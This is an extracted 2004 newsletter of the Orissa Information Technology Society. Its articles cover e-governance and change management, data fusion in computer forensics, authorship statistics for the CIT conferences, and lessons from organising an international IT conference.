Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

